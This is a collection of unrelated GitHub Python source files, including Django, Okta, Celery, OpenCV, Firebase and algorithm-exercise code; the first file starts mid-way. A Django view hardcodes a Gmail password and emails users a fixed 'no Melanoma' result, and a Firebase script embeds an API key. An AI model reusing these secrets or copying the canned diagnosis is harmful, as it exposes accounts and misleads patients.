ssl.create_default_context()\n server.starttls(context=context)\n server.login(\"melanomai.proccess@gmail.com\", 'Wowzers!')\n\n #Send the mail\n msg = EmailMessage()\n \n msg.set_content(\"\"\"\n Hey there!\n MelanomAI has confirmed your email. We analyzed your image and we detected no Melanoma! Hooray!\n Thanks,\n The MelanomAI Team\n \"\"\")\n \n email = form.cleaned_data['email']\n msg[\"Subject\"] = \"MelanomAI Email Confirm\"\n msg[\"From\"] = 'melanomai.proccess@gmail.com'\n msg['To'] = email\n\n\n server.send_message(msg)\n server.quit()\n return HttpResponseRedirect('/thanks/')\n\n \n\n context = {'form': form}\n return render(request, 'C:/Users/Sumeet/Melanoma/myapp2/templates/form.html' ,context)\n\ndef thanks(request):\n return render(request, 'C:/Users/Sumeet/Melanoma/myapp2/templates/thanks.html')","repo_name":"YouCantTouchThis/MelanomaAIFinal","sub_path":"myapp2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31417529905","text":"#!/usr/bin/python\n# Okta oauth client credentials flow with Workflow identity federation\nimport os\nimport json\nimport requests\nimport base64\nimport secrets\n\n\ndef get_okta_token():\n okta_az_server = os.environ[\"OKTA_AZ_SERVER\"]\n client_id = os.environ[\"CLIENT_ID\"]\n client_secret = os.environ[\"CLIENT_SECRET\"]\n encodedData = base64.b64encode(bytes(f\"{client_id}:{client_secret}\", \"ISO-8859-1\")).decode(\"ascii\")\n\n cookies = {\n 'JSESSIONID': secrets.token_urlsafe(33),\n }\n\n headers = {\n 'Accept': '*/*',\n 'Authorization': 'Basic %s' % {encodedData},\n 'Cache-Control': 'no-cache',\n 'Content-Type': 'application/x-www-form-urlencoded',\n }\n\n data = {\n 'grant_type': 'client_credentials'\n }\n\n response = requests.post(okta_az_server,\n headers=headers, cookies=cookies, data=data)\n response.raise_for_status()\n print(\"Creating Okta token file\")\n data = response.json()\n with open('/tmp/okta-token.json', 'w', encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False, indent=4)\n\n\nif __name__ == '__main__':\n print(\"Running main\")\n get_okta_token()\n","repo_name":"jasonbisson/terraform-google-workload-identity-federation","sub_path":"files/get_oidc_token.py","file_name":"get_oidc_token.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"26485024851","text":"import os\nimport sys\n\nfrom setuptools import setup\n\n\nDEBUG_BUILD = os.environ.get(\"SOURMASH_DEBUG\") == \"1\"\n\n\ndef build_native(spec):\n cmd = [\"cargo\", \"build\", \"--manifest-path\", \"src/core/Cargo.toml\", \"--lib\"]\n\n target = \"debug\"\n if not DEBUG_BUILD:\n cmd.append(\"--release\")\n target = \"release\"\n\n build = spec.add_external_build(cmd=cmd, path=\".\")\n\n rtld_flags = [\"NOW\"]\n if sys.platform == \"darwin\":\n rtld_flags.append(\"NODELETE\")\n spec.add_cffi_module(\n module_path=\"sourmash._lowlevel\",\n dylib=lambda: build.find_dylib(\"sourmash\", in_path=\"target/%s\" % target),\n header_filename=lambda: build.find_header(\"sourmash.h\", in_path=\"include\"),\n rtld_flags=rtld_flags,\n )\n\nsetup(\n milksnake_tasks=[build_native],\n package_dir={\"\": \"src\"},\n)\n","repo_name":"Domedriver/sourmash","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"7668566405","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n #to print the tree\n def __str__(self):\n i = 0\n ret = \"\\t\" * (i+1) + repr(self.val) + \"\\n\"\n tr = [self.left, self.right]\n for child in tr:\n ret += child.__str__()\n return ret\n\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n if root is None:\n return \"X\"\n left_subtree = self.serialize(root.left)\n right_subtree = self.serialize(root.right)\n return str(root.val) + \",\" + left_subtree + \",\" + right_subtree\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n nodes = data.split(\",\")\n self.point = 0\n \n def deserialize_helper():\n if nodes[self.point] == \"X\":\n self.point += 1\n return None\n root = TreeNode(int(nodes[self.point]))\n self.point += 1\n root.left = deserialize_helper()\n root.right = deserialize_helper()\n return root\n\n return deserialize_helper()\n\n# Your Codec object will be instantiated and called as such:\n# Your Codec object will be instantiated and called as such:\nser = Codec()\ndeser = Codec()\nroot = TreeNode(20)\nroot.left = TreeNode(8)\nroot.right = TreeNode(22)\n# root.left.left = TreeNode(4)\n# root.left.right = TreeNode(12)\n# root.right.left = TreeNode(10)\n# root.right.right = TreeNode(14)\nstr(root)\nprint(root)\ntree = ser.serialize(root) # root = [2,1,3] Inorder\nans = deser.deserialize(tree)\nstr(ans)\nprint(ans)","repo_name":"radhikasharma11/Leetcode","sub_path":"Serialize_Deserialize_BST.py","file_name":"Serialize_Deserialize_BST.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8666976043","text":"import pytest\nimport random\nimport os\nfrom percolation import *\n\ndef test_closed():\n random.seed(2)\n n = random.randint(1, 300)\n matrix = Percolation(n)\n for i in range(1,n+1):\n assert matrix.opened[i] == 0\n\ndef test_open():\n random.seed(2)\n n = random.randint(1, 300)\n matrix = Percolation(n)\n row = random.randint(1, n)\n col = random.randint(1, n)\n matrix.open(row,col)\n assert matrix.opened[(row-1)*n+(col)] == 1\n\ndef test_closed_not_percolates():\n random.seed(2)\n n = random.randint(1, 300)\n matrix = Percolation(n)\n assert matrix.percolates() == False\n \ndef test_open_percolates():\n random.seed(2)\n n = random.randint(1, 300)\n matrix = Percolation(n)\n for row in range(1, n+1):\n for col in range(1, n+1):\n matrix.open(row,col)\n assert matrix.percolates() == True\n\ndef test_files():\n for filename in os.listdir(os.getcwd()+'/tests'):\n file = open(os.getcwd()+'/tests/'+filename,\"r\")\n n =file.readline()\n n = n.strip()\n n = int(n)\n matrix = Percolation(n)\n percolates = file.readline()\n percolates = percolates.strip()\n data = [line.split() for line in file.readlines()]\n for i in data:\n if i != []:\n row = i[0]\n row = int(row)\n col = i[1]\n col = int(col)\n matrix.open(row,col)\n if percolates == \"yes\":\n assert matrix.percolates() == True\n else:\n assert matrix.percolates() == False\n \n\n# Percolation threshold has been established to be in 0.593\n# Adding sigma to account for randmoness\ndef test_percolation_mean():\n sigma = 0.01\n mean = PercolationStats.PercolationStats(200,10)\n mean_res = mean < (0.593 + sigma) and mean > (0.593 - sigma)\n assert mean_res == True\n","repo_name":"Fackelmann/algorithms_and_data_structures","sub_path":"UnionFind/test_percolation.py","file_name":"test_percolation.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10036487148","text":"import numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('messi.jpg')\r\nimg2=cv2.imread('woman.jpg')\r\n\r\nprint(img.shape)\r\nprint(img.size)\r\nprint(img.dtype)\r\nb,g,r=cv2.split(img)\r\n\r\nimg= cv2.resize(img,(100,100))\r\nimg2=cv2.resize(img2,(100,100))\r\n\r\naddedImage=cv2.add(img2,img)\r\n\r\n#addedImageWeighted=cv2.add(img,0.9,img2,0.1,0)\r\n\r\n\r\n# img=cv2.merge((b,g,r))\r\n# ball=img[80:100,140:160]\r\n# img[120:140,60:80]=ball\r\ncv2.imshow('image', addedImage)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"Ricky-arch/OpenCV","sub_path":"basic_operations_on_images.py","file_name":"basic_operations_on_images.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43037891527","text":"# Quick Sort\n\ndef partition(A, p, r):\n x = A[r][0]\n i = p - 1\n for j in range(p, r):\n if A[j][0] <= x:\n i += 1\n A[i], A[j] = A[j], A[i]\n A[i + 1], A[r] = A[r], A[i + 1]\n return i + 1\n\n\ndef quicksort(A, p, r):\n if p < r:\n q = partition(A, p, r)\n quicksort(A, p, q - 1)\n quicksort(A, q + 1, r)\n\n\ndef check_stable(A, B):\n # A_dict[(num, char)] = そのnumに対応するcharがどういう順番で出現したか\n A_dict = {}\n B_dict = {}\n for num, char in A:\n if num not in A_dict:\n A_dict[num] = [char]\n else:\n A_dict[num].append(char)\n for num, char in B:\n if num not in B_dict:\n B_dict[num] = [char]\n else:\n B_dict[num].append(char)\n\n for num in A_dict:\n if A_dict[num] != B_dict[num]:\n return False\n\n return True\n\n\n\nn = int(input())\nA = []\nfor _ in range(n):\n char, num = input().split()\n num = int(num)\n A.append((num, char))\n\nB = A[:]\nquicksort(A, 0, n - 1)\nis_stable = check_stable(A, B)\n\nif is_stable:\n print(\"Stable\")\nelse:\n print(\"Not stable\")\n\nfor num, char in A:\n print(char, num)\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/ALDS1_6_C_1104.py","file_name":"ALDS1_6_C_1104.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70467833652","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 29 11:40:21 2022\n\n@author: luisg\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\n\n#Exercise 1\n#The following Series is given (quotations variable):\n\n#PLW 387.0\n#CDR 339.5\n#TEN 349.5\n#11B 391.0\n#dtype: float64\n\n#Convert the quotations to the DataFrame and set the column name to 'price'.\n#In response, print this DataFrame to the console.\n\nstocks = {'PLW': 387.00, 'CDR': 339.5, 'TEN': 349.5, '11B': 391.0}\nquotations = pd.Series(data=stocks)\n\nquotations = pd.DataFrame(quotations, columns=['price'])\nprint(quotations)\n\n\n\n#Exercise 2\n#Using the numpy and pandas create the following Series:\n\n#101 10.0\n#102 20.0\n#103 30.0\n#104 40.0\n#105 50.0\n#106 60.0\n#107 70.0\n#108 80.0\n#109 90.0\n#dtype: float64\n\n#In response, print this Series to the console.\n\n\nindex = np.arange(101, 110)\nvalor = np.arange(10, 100, 10)\nprint(pd.Series(valor, index=index))\n\n\n\n#Exercise 3\n#The following Series is given:\n\nseries = pd.Series(['001', '002', '003', '004'], list('abcd'))\n\n#Convert its type to int and print this Series to the console.\n\nseries = pd.Series(series, dtype='int')\nprint(series)\n\n#SOLUÇÃO DO EXERCICIO\nseries = pd.to_numeric(series)\nprint(series)\n\n\n\n\n\n\n","repo_name":"atico0/python","sub_path":"100 Days of Code Data Scientist Challenge 2022/day 32.py","file_name":"day 32.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70741538614","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport urllib.request\n\nMIN_MATCH_COUNT = 10\n\ndef url_to_image(url):\n\tresp = urllib.request.urlopen(url)\n\timage = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n\timage = cv2.imdecode(image, cv2.IMREAD_COLOR)\n\treturn image\n\n\n# img1 = cv2.imread('../../frontend/repo/joico/Shampoo/Recortadas/BL_Shampoo_300ml.jpg',0) # queryImage\n# img2 = url_to_image('http://mlb-s2-p.mlstatic.com/854454-MLB26525962127_122017-O.jpg') # trainImage\n# img1 = cv2.imread('../frontend/repo/pruebaNike-Air-Force-1-Low-Moto-W-1100x553.png',0) # queryImage\n# img2 = cv2.imread('../frontend/repo/pruebanike-air-force-1-dominican-republic-de-lo-mio-release-date-2.jpg',0) # trainImage\n\n\n# Initiate SIFT detector\n# sift = cv2._SIFT()\nsift = cv2.xfeatures2d.SIFT_create()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 50)\n\nflann = cv2.FlannBasedMatcher(index_params, search_params)\n\nmatches = flann.knnMatch(des1,des2,k=2)\n\n# store all the good matches as per Lowe's ratio test.\ngood = []\nfor m,n in matches:\n if m.distance < 0.7*n.distance:\n good.append(m)\n\nif len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n h,w = img1.shape\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv2.perspectiveTransform(pts,M)\n\n img2 = cv2.polylines(img2,[np.int32(dst)],True,255,3, cv2.LINE_AA)\n\nelse:\n \n matchesMask = None\n\nprint (len(good),MIN_MATCH_COUNT)\nprint (len(good)/MIN_MATCH_COUNT) \n \n\ndraw_params = dict(matchColor = (0,255,0), # draw matches in green color\n singlePointColor = None,\n matchesMask = matchesMask, # draw only inliers\n flags = 2)\n\nimg3 = cv2.drawMatches(img1,kp1,img2,kp2,good,None,**draw_params)\n\nplt.imshow(img3, 'gray'),plt.show()\n\n\ncv2.destroyAllWindows()","repo_name":"jlobasso/imageMatcher","sub_path":"backend/ejemplos/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18406855329","text":"import itertools; import math; import operator; import random; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce, lru_cache; from heapq import *; import unittest; from typing import List;\ndef get_sol(): return Solution()\nclass Solution:\n # union find\n def equationsPossible(self, equations: List[str]) -> bool:\n # root = {} # also works\n # def find(x):\n # p=root.get(x,x)\n # if p==x: return p\n # root[x] = find(p)\n # return root[x]\n # def union(x,y):\n # root[find(x)]=find(y)\n root = {}\n def add(x):\n if x not in root:\n root[x] = x\n def find(x):\n if x not in root:\n p = x\n else:\n p = root[x]\n if p==x:\n return p\n root[x] = find(root[x])\n return root[x]\n def union(x,y):\n add(x),add(y)\n px,py = find(x), find(y)\n root[px]=root[py]\n\n # if x==y then x and y will belong to the same component\n for eq in equations:\n if eq[1]=='=':\n union(eq[0],eq[3])\n\n # if x!=y then x and y will belong the different components\n for eq in equations:\n if eq[1]=='!':\n px, py = find(eq[0]), find(eq[3])\n if px==py:\n return False\n return True\nclass Solution2:\n # graph coloring and dfs\n def equationsPossible(self, equations: List[str]) -> bool:\n colors={}\n def dfs(u,color):\n if u in colors: return\n colors[u]=color\n for v in g[u]:\n dfs(v,color)\n g=defaultdict(set)\n for a,sign,__,b in equations:\n if sign=='=':\n g[a].add(b)\n g[b].add(a)\n\n color=0\n for a,sign,__,b in equations:\n if sign=='=':\n if a not in colors:\n dfs(a,color)\n color+=1\n elif b not in colors:\n dfs(b,color)\n color+=1\n for a,sign,__,b in equations:\n if sign=='!':\n if a==b: return False\n if a not in colors or b not in colors:\n continue\n if colors[a]==colors[b]: return False\n return True\n\nclass MyTestCase(unittest.TestCase):\n def test_1(self):\n self.assertEqual(False, get_sol().equationsPossible([\"a==b\",\"b!=a\"]))\n def test_2(self):\n self.assertEqual(True, get_sol().equationsPossible([\"b==a\",\"a==b\"]))\n def test_3(self):\n self.assertEqual(True, get_sol().equationsPossible([\"a==b\",\"b==c\",\"a==c\"]))\n def test_4(self):\n self.assertEqual(False, get_sol().equationsPossible([\"a==b\",\"b!=c\",\"c==a\"]))\n def test_5(self):\n self.assertEqual(True, get_sol().equationsPossible([\"c==c\",\"b==d\",\"x!=z\"]))\n def test_6(self):\n self.assertEqual(False, get_sol().equationsPossible([\"a!=a\"]))\n def test_7(self):\n self.assertEqual(False, get_sol().equationsPossible([\"a==b\",\"e==c\",\"b==c\",\"a!=e\"]))\n def test_8(self):\n self.assertEqual(True, get_sol().equationsPossible([\"b==a\",\"a==b\"]))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc990.py","file_name":"lc990.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26896140247","text":"from .effnetv2_model import EffNetV2Model\r\nimport tensorflow as tf\r\nimport os\r\n\r\ndef EfficientNetV2(\r\n model_name='efficientnetv2-s',\r\n weights=None,\r\n input_shape=None,\r\n include_top=True,\r\n dropout_rate=None,\r\n pooling=True,\r\n num_class=1000):\r\n model = EffNetV2Model(model_name=model_name,include_top=include_top,pooling=pooling)\r\n if not input_shape:\r\n size = model.cfg.eval.isize\r\n input_shape = (size, size, 3)\r\n x = tf.keras.Input(input_shape)\r\n output = model.call(x, training=None)\r\n\r\n if pooling and not include_top and num_class:\r\n if dropout_rate:\r\n output = tf.keras.layers.Dropout(dropout_rate)(output)\r\n output = tf.keras.layers.Dense(num_class)(output)\r\n\r\n model = tf.keras.Model(inputs=x,outputs=output)\r\n\r\n if weights:\r\n if os.path.exists(weights):\r\n model.load_weights(weights,by_name=True,skip_mismatch=True)\r\n else:\r\n raise ValueError('invalid weights path: {}!'.format(weights))\r\n\r\n return model","repo_name":"cersar/efficientnetv2","sub_path":"efficientnetv2/efficientnetv2.py","file_name":"efficientnetv2.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20833248864","text":"#-*-coding:utf-8-*-\n#/usr/bin/env python\n__author__ = \"Allan\"\n\nimport socketserver\n\nclass MyServer(socketserver.BaseRequestHandler):\n\n def handle(self):\n # print self.request,self.client_address,self.server\n conn = self.request\n conn.sendall(bytes('Welcome to call 10086,please input 1xxx to customer service.',encoding='utf-8'))\n Flag = True\n while Flag:\n data_bytes = conn.recv(1024)\n data = str(data_bytes,encoding='utf-8')\n if data == 'exit':\n Flag = False\n elif data == '0':\n conn.sendall(bytes('This communication will be recorded',encoding='utf-8'))\n else:\n conn.sendall(bytes('Please re-input.',encoding='utf-8'))\n\n\nif __name__ == '__main__':\n #socket+select+多线程\n #IP端口,类名\n #Myserver==>RequestHandlerClass\n #obj = self.RequestHandlerClass\n #obj.handle()\n #ThreadingTCPServer.init =>TCPServer.init()\n #1.server对象\n # self.server_address ('127.0.0.1',8009)\n # self.RequestHandlerClass (MyServer)\n # self.socket 创建服务端socket对象\n server = socketserver.ThreadingTCPServer(('127.0.0.1',8009),MyServer)\n # 1.server对象的server_forever()\n server.serve_forever()\n\n","repo_name":"nurruden/training","sub_path":"day10/socket_server_thread.py","file_name":"socket_server_thread.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19687125943","text":"import pyrebase\nconfig = { \n \"apiKey\": \"AIzaSyBL9p5Gp7hkprcNy_Bj9TGZFQnJW8YaM3Y\",\n \"authDomain\": \"finalproject-db669.firebaseapp.com\",\n \"databaseURL\": \"https://finalproject-db669-default-rtdb.firebaseio.com\",\n \"storageBucket\": \"finalproject-db669.appspot.com\"\n}\nfirebase = pyrebase.initialize_app(config)\ndb = firebase.database()\nstorage = firebase.storage()\ndb.child(\"Global_variable\").child(\"face\").child(\"canceladdface\").set(\"False\")\n# users = db.child(\"users\").get()\n# data = db.child(\"History\").child(\"xin chao\").get()\n# db.child(\"History\").child(\"12//2//3\").set(\"xxxxx\")\n# print(data.val())\n# # print(type(users.val()))\n# Dict = {}\n# for user in users.each():\n# Dict[user.val()['id']] = [user.val()['idcard'],user.val()['lablename']]\n# # print(Dict)\n\n# # for key, value in Dict.items():\n# # print(key, ' : ', value)\n# id = '320097137727'\n# index = \"\"\n# lists = list(Dict.values())\n# print(lists)\n# for x in lists:\n# if id in x:\n# print(\"ok\")\n# # if id in Dict.values():\n# # Dict\n# # else:\n# # print(\"àasfasfsaf\")\n\n\"\"\" code get url của 1 file trên firebase\n url = storage.child(\"acv\")\nlocalpath = \"/home/pi/Desktop/a.jpg\"\ncloud = \"image/pi.jpg\"\n# firebase.storage().child(cloud).put(localpath)\nprint(type(storage.child(\"PicAvt/CJjR87lyjdOvnxMObDvuqtzyeXx2.jpg\").get_url(None))) \"\"\"\n\n\n\"\"\" Code get tất cả các giá trị rfid, lable, active của các user cho vào 1 dictionary\nRefUsers = db.child(\"users\").get()\nDictValAuthUser = {}\nfor user in RefUsers.each():\n DictValAuthUser[user.val()['id']] = [user.val()['idcard'],user.val()['lablename'], user.val()['active']]\n\nprint(DictValAuthUser) \"\"\"\n\n\"\"\" code xóa lablename trong file đã mã hóa \nls = []\nfor index, val in enumerate(encoded_data['names']):\n\tif val == \"thanh\":\n\t\tls.append(index)\nprint(ls)\nif len(ls):\n\tdel encoded_data['encodings'][ls[0]:ls[-1]+1]\n\tdel encoded_data['names'][ls[0]:ls[-1]+1]\n\nwith open(\"Mahoa.pickle\", 'wb') as file:\n\tfile.write(pickle.dumps(encoded_data)) \"\"\"\n","repo_name":"thanh182790/DATN_TEST","sub_path":"getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42036086927","text":"from celery.task import task\nfrom celery.task.sets import subtask\nfrom subprocess import check_call\nimport glob, shutil \nimport os,ast\n\n@task()\ndef initEnKFrun(callback=None,basedir=None,site=None,siteparam=None):\n if not site:\n raise \"site is a required parameter\"\n if siteparam:\n param = ast.literal_eval(siteparam)\n else:\n raise \"Parameters are required. Please submit Paramerers with task submission\"\n if not basedir:\n raise \"Basedir is required\"\n #Create working directory\n newDir = basedir + \"celery_data/\" + str(initEnKFrun.request.id)\n check_call([\"mkdir\",newDir])\n os.chdir(newDir)\n #copy matlab code to working directory\n codeDir =basedir + 'enfk_matlab/'\n for file in glob.glob(codeDir + '*'): \n shutil.copy(file, newDir) \n #check_call([\"cp\",\"-r\",codeDir + '*',newDir])\n #set inital Paramters files\n setup_param(newDir,param)\n if callback:\n result=subtask(callback).delay(task_id=str(initEnKFrun.request.id),wkdir=newDir)\n return {'task_id':result.task_id,'task_name':result.task_name}\n else:\n return newDir\n\n\n@task()\ndef runEnKF(task_id=None,wkdir=None):\n os.chdir(wkdir)\n check_call([\"/opt/matlab_R2012/bin/matlab\",\"-nodisplay\",\"-r\",\"try,EnKF, catch, end, quit\",\">\",\"Matlab_log.txt\"])\n #clean up output folder\n check_call([\"mkdir\",wkdir + '/matlab_code' ])\n for file in glob.glob(wkdir + '/*.m'):\n shutil.move(file, wkdir + '/matlab_code')\n for file in glob.glob(wkdir + '/*.txt'):\n if not os.path.basename(file)=='Matlab_log.txt':\n shutil.move(file, wkdir + '/matlab_code')\n for file in glob.glob(wkdir + '/*.csv'):\n shutil.move(file, wkdir + '/matlab_code')\n #zip all files\n check_call(['zip','-r','model_run_archive','.'])\n #scp to static server\n webloc =\"/static/queue/model/teco/\" + task_id\n check_call(['scp','-r', wkdir , \"mstacy@static.cybercommons.org:\" + webloc])\n #render results\n temp = \"

Result Files


\"\n http= \"http://static.cybercommons.org/queue/model/teco/\" + task_id \n temp = temp + '
Download Model Results
'\n temp = temp + \"

EnKF Result Graphs


\"\n temp=temp + ' Figure 1
'\n temp=temp + ' \"Figure
'\n #temp=temp + ' ' + http + '/figure1.jpg
'\n temp=temp + ' Figure 2
'\n temp=temp + ' \"Figure
'\n #temp=temp + ' ' + http + '/figure2.jpg
'\n temp=temp + ' Figure 4
'\n temp=temp + ' \"Figure
'\n #temp=temp + ' ' + http + '/figure4.jpg
'\n temp=temp + ' Figure 5
'\n temp=temp + ' \"Figure
'\n #temp=temp + ' ' + http + '/figure5.jpg
'\n temp=temp + ' Figure 7
'\n temp=temp + ' \"Figure
'\n #temp=temp + ' ' + http + '/figure7.jpg
'\n temp=temp + ' Figure 8
'\n temp=temp + ' \"Figure
'\n #temp=temp + ' ' + http + '/figure8.jpg
'\n temp=temp + ' Figure 9
'\n temp=temp + ' \"Figure
'\n #temp=temp + ' ' + http + '/figure9.jpg
'\n return temp\n\ndef setup_param(newDir, param):\n try:\n f1= open(newDir + '/param.m','w')\n tfile ='function x = param(parm)\\n% Initial parameters\\n'\n tfile=tfile + 'cmin = [' + str(param['cmin1']) + ' ' + str(param['cmin2']) + ' ' + str(param['cmin3']) + ' ' + str(param['cmin4']) + ' '\n tfile=tfile + str(param['cmin5']) + ' ' + str(param['cmin6']) + ' ' + str(param['cmin7']) + ' ' + str(param['cmin8']) + '];\\n'\n tfile=tfile + 'cmax = [' + str(param['cmax1']) + ' ' + str(param['cmax2']) + ' ' + str(param['cmax3']) + ' ' + str(param['cmax4']) + ' '\n tfile=tfile + str(param['cmax5']) + ' ' + str(param['cmax6']) + ' ' + str(param['cmax7']) + ' ' + str(param['cmax7']) + '];\\n' \n tfile=tfile + 'x0 = ['+ str(param['x1']) + ' ' + str(param['x2']) + ' ' + str(param['x3']) + ' ' + str(param['x4']) + ' ' + str(param['x5']) + ' '\n tfile=tfile + str(param['x6']) + ' ' + str(param['x7']) + ' ' + str(param['x8']) + '];\\n'\n tfile=tfile + 'c0 = ['+ str(param['c1']) + ' ' + str(param['c2']) + ' ' + str(param['c3']) + ' ' + str(param['c4']) + ' ' + str(param['c5']) + ' '\n tfile=tfile + str(param['c6']) + ' ' + str(param['c7']) + ' ' + str(param['c8']) + '];\\n'\n tfile=tfile + 'mscut = ' + str(param['mscut']) + ';\\n'\n tfile=tfile + 'b = ['+ str(param['b1']) + ' ' + str(param['b2']) + ' ' + str(param['b3']) + ' 0 0 0 0 0]\\n'\n tfile=tfile + 'A=[-1 0 0 0 0 0 0 0\\n'\n tfile=tfile + ' 0 -1 0 0 0 0 0 0\\n'\n tfile=tfile + ' 0 0 -1 0 0 0 0 0\\n'\n tfile=tfile + ' ' + str(param['A41']) + ' ' + str(param['A42']) + ' ' + '0 -1 0 0 0 0\\n'\n tfile=tfile + ' ' + str(param['A51']) + ' ' + str(param['A52']) + ' ' + '1 0 -1 0 0 0\\n'\n tfile=tfile + ' 0 0 0 ' + str(param['A64']) + ' ' + str(param['A65']) + ' ' + '-1 '+ str(param['A67']) + ' ' + str(param['A68']) + '\\n'\n tfile=tfile + ' 0 0 0 0 ' + str(param['A75']) + ' ' + str(param['A76']) + ' ' + '-1 0\\n'\n tfile=tfile + ' 0 0 0 0 0 '+ str(param['A86']) + ' ' + str(param['A87']) + ' ' + '-1];\\n'\n tfile = tfile + \"if strcmp(parm,'cmin')\\n\\tz = cmin;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'cmax')\\n\\tz = cmax;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'x0')\\n\\tz = x0;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'c0')\\n\\tz = c0;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'mscut')\\n\\tz = mscut;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'b')\\n\\tz = b;\\nend\\n\"\n tfile = tfile + \"if strcmp(parm,'A')\\n\\tz = A;\\nend\\n\"\n tfile = tfile + \"x=z;\\nend\\n\"\n \n f1.write(tfile)\n f1.close()\n except Exception as inst:\n raise inst\n\n","repo_name":"ouinformatics/cybercomq","sub_path":"cybercomq/model/teco/enkf.py","file_name":"enkf.py","file_ext":"py","file_size_in_byte":7284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73357852212","text":"\"\"\"Makes a sweep directory for FabNESO.\"\"\"\n\nimport argparse\nfrom ast import literal_eval\nfrom pathlib import Path\n\nfrom .ensemble_tools import create_dict_sweep, create_dir_tree\n\n\ndef main() -> None:\n \"\"\"Entrypoint for script to make sweep directory.\"\"\"\n # Make the argument parser\n parser = argparse.ArgumentParser(\n description=\"Makes a sweep directory for FabNESO\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"--sweep_path\",\n help=\"The path to write the \",\n type=Path,\n default=Path(__file__).parent.parent / \"config_files\" / \"two_stream_ensemble\",\n )\n parser.add_argument(\n \"--n_dirs\",\n help=\"Number of divisions in grid for each parameter\",\n type=int,\n default=5,\n )\n parser.add_argument(\n \"--destructive\",\n \"-d\",\n help=\"Deletes the previous tree if it already exists\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--copy_dir\",\n help=\"Copy contents of this dir to the sweep dirs\",\n type=Path,\n default=Path(__file__).parent.parent / \"config_files\" / \"two_stream\",\n )\n parser.add_argument(\n \"--edit_file\",\n help=\"Template a parameter in this file\",\n default=\"conditions.xml\",\n )\n parser.add_argument(\n \"--para_to_template\",\n help=\"The parameter in the config file to template for the scan\",\n default=\"\",\n )\n parser.add_argument(\n \"--scan_min\", help=\"Lower limit of the parameter scan\", type=float, default=0\n )\n parser.add_argument(\n \"--scan_max\", help=\"Upper limit of the parameter scan\", type=float, default=0\n )\n parser.add_argument(\n \"--parameter_dict\",\n help=\"An input dict of the parameters to be scanned.\",\n default=\"\",\n )\n parser.add_argument(\"--dir_prefix\", help=\"Prefix to call output dir\", default=\"d\")\n args = parser.parse_args()\n\n if args.parameter_dict != \"\":\n # If this has been specified, we'll automatically create\n # the directory tree as a multidimensional scan of these points\n parameter_dict = literal_eval(args.parameter_dict)\n # Check we have made a dict\n if not 